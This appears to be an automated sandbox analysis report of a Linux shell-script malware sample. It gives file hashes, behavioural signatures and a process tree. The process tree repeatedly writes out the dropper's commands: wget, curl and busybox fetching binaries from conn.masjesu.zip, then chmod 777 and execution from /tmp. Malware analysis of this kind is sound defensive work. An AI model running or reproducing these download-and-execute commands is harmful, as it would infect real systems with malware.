Analysis
-
max time kernel
78s -
max time network
80s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
28/10/2024, 01:32
Static task
static1
Behavioral task
behavioral1
Sample
ca6f6dd0b35e3185039cfaea57b698bb3420ac16e537baa554611d42f71995ac.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ca6f6dd0b35e3185039cfaea57b698bb3420ac16e537baa554611d42f71995ac.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ca6f6dd0b35e3185039cfaea57b698bb3420ac16e537baa554611d42f71995ac.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
ca6f6dd0b35e3185039cfaea57b698bb3420ac16e537baa554611d42f71995ac.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
ca6f6dd0b35e3185039cfaea57b698bb3420ac16e537baa554611d42f71995ac.sh
-
Size
10KB
-
MD5
a1329951e2eba09d1222076e3dd4b047
-
SHA1
ab745d5eeb288f4b11eb212ecc7ca42d3de79e92
-
SHA256
ca6f6dd0b35e3185039cfaea57b698bb3420ac16e537baa554611d42f71995ac
-
SHA512
fd0e9356a3b477d8e50ecf95446d00e3f0829e1189c56f6592087be740ef52ec0048ba14cbd86b021a7bd793a2364011c811504a66eda3f14968a546fb7c89ab
-
SSDEEP
192:cVUINuG7Uo9GmNNMuUJmHXeVlhrHXeVlhcxUINuGpUo9GmT:qUINuG7Uo9GmNNMuUJNUINuGpUo9GmT
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
-
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/ca6f6dd0b35e3185039cfaea57b698bb3420ac16e537baa554611d42f71995ac.sh/tmp/ca6f6dd0b35e3185039cfaea57b698bb3420ac16e537baa554611d42f71995ac.sh1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:707
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- System Network Configuration Discovery
PID:710
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:724
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- System Network Configuration Discovery
PID:732
-
-
/bin/chmodchmod 777 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP./7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- Executes dropped EXE
PID:735
-
-
/bin/rmrm 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵PID:736
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:737
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- System Network Configuration Discovery
PID:740
-
-
/bin/chmodchmod 777 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK./2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:743
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- System Network Configuration Discovery
PID:744
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- System Network Configuration Discovery
PID:747
-
-
/bin/chmodchmod 777 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4./EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵PID:750
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- System Network Configuration Discovery
PID:751
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:756
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- System Network Configuration Discovery
PID:767
-
-
/bin/chmodchmod 777 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- File and Directory Permissions Modification
PID:771
-
-
/tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F./PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- Executes dropped EXE
PID:772
-
-
/bin/rmrm PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵PID:775
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- System Network Configuration Discovery
PID:776
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:783
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- System Network Configuration Discovery
PID:791
-
-
/bin/chmodchmod 777 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- File and Directory Permissions Modification
PID:798
-
-
/tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp./5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- Executes dropped EXE
PID:800
-
-
/bin/rmrm 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵PID:804
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵PID:805
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:811
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- System Network Configuration Discovery
PID:813
-
-
/bin/chmodchmod 777 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2./zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵PID:816
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵PID:817
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- System Network Configuration Discovery
PID:820
-
-
/bin/chmodchmod 777 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3./JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵PID:823
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- System Network Configuration Discovery
PID:824
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- System Network Configuration Discovery
PID:836
-
-
/bin/chmodchmod 777 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir./EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- Executes dropped EXE
PID:844
-
-
/bin/rmrm EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵PID:847
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- System Network Configuration Discovery
PID:848
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- System Network Configuration Discovery
PID:867
-
-
/bin/chmodchmod 777 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C./BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵PID:870
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:871
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- System Network Configuration Discovery
PID:874
-
-
/bin/chmodchmod 777 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7./rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:877
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- System Network Configuration Discovery
PID:878
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- System Network Configuration Discovery
PID:881
-
-
/bin/chmodchmod 777 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- File and Directory Permissions Modification
PID:882
-
-
/tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8./tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- Executes dropped EXE
PID:883
-
-
/bin/rmrm tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵PID:884
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵PID:885
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:886
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- System Network Configuration Discovery
PID:888
-
-
/bin/chmodchmod 777 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD./v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵PID:891
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- System Network Configuration Discovery
PID:892
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵PID:895
-
-
/bin/chmodchmod 777 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d./MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵PID:898
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- System Network Configuration Discovery
PID:899
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- System Network Configuration Discovery
PID:902
-
-
/bin/chmodchmod 777 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF./PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵PID:905
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵PID:906
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- System Network Configuration Discovery
PID:909
-
-
/bin/chmodchmod 777 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD./v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵PID:912
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- System Network Configuration Discovery
PID:913
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- System Network Configuration Discovery
PID:916
-
-
/bin/chmodchmod 777 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d./MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵PID:919
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵PID:920
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵PID:923
-
-
/bin/chmodchmod 777 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF./PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵PID:926
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- System Network Configuration Discovery
PID:927
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- System Network Configuration Discovery
PID:930
-
-
/bin/chmodchmod 777 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP./7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵PID:933
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- System Network Configuration Discovery
PID:934
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:937
-
-
/bin/chmodchmod 777 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK./2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:940
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵PID:941
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- System Network Configuration Discovery
PID:944
-
-
/bin/chmodchmod 777 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4./EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵PID:947
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- System Network Configuration Discovery
PID:948
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- System Network Configuration Discovery
PID:951
-
-
/bin/chmodchmod 777 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir./EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵PID:954
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- System Network Configuration Discovery
PID:955
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- System Network Configuration Discovery
PID:958
-
-
/bin/chmodchmod 777 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C./BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵PID:961
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:962
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- System Network Configuration Discovery
PID:965
-
-
/bin/chmodchmod 777 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- File and Directory Permissions Modification
PID:966
-
-
/tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7./rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- Executes dropped EXE
PID:967
-
-
/bin/rmrm rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:968
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- System Network Configuration Discovery
PID:969
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:970
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- System Network Configuration Discovery
PID:972
-
-
/bin/chmodchmod 777 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8./tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵PID:975
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- System Network Configuration Discovery
PID:976
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- System Network Configuration Discovery
PID:979
-
-
/bin/chmodchmod 777 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F./PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- Executes dropped EXE
PID:981
-
-
/bin/rmrm PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵PID:982
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- System Network Configuration Discovery
PID:983
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:984
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- System Network Configuration Discovery
PID:986
-
-
/bin/chmodchmod 777 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- File and Directory Permissions Modification
PID:987
-
-
/tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp./5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- Executes dropped EXE
PID:988
-
-
/bin/rmrm 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵PID:989
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- System Network Configuration Discovery
PID:990
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:991
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- System Network Configuration Discovery
PID:993
-
-
/bin/chmodchmod 777 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- File and Directory Permissions Modification
PID:994
-
-
/tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2./zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- Executes dropped EXE
PID:995
-
-
/bin/rmrm zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵PID:996
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- System Network Configuration Discovery
PID:997
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:998
-
-
